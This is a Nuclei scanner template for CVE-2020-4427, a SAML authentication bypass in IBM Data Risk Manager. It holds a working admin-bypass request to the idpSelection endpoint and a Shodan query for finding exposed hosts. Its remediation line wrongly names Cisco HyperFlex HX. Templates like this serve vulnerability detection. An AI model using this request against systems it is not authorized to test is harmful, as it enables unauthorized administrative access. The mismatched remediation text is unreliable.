id: CVE-2020-4427 info: name: IBM Data Risk Manager - Authentication Bypass via SAML author: ritikchaddha severity: critical description: | IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system. impact: | Unauthenticated attackers can bypass authentication via SAML endpoint and gain full administrative access to IBM Data Risk Manager, compromising all managed data risk information. remediation: | Apply the latest security updates and patches provided by Cisco for HyperFlex HX. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb - https://seclists.org/fulldisclosure/2020/Apr/33 - https://www.ibm.com/support/pages/node/6206875 - https://nvd.nist.gov/vuln/detail/CVE-2020-4427 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-4427 cwe-id: CWE-287 epss-score: 0.9274 epss-percentile: 0.99765 cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:* metadata: verified: false max-request: 1 vendor: ibm product: data_risk_manager shodan-query: title:"IBM Data Risk Manager" tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln http: - method: GET path: - "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin" matchers-condition: and matchers: - type: word part: location words: - "localhost:8765" - "saml/idpSelection" condition: and - type: status status: - 302 extractors: - type: kval part: header kval: - location # digest: 4a0a00473045022100fc8a31457e6ab5d70adf77e73bfc44ae462b321ae7f07fac0d6f49c5c15ed0d10220105dae6dc665ffaf3184f364df805f99f791b9d0857b3ba63aa42b46dcdedae4:922c64590222798bb761d5b6d8e72950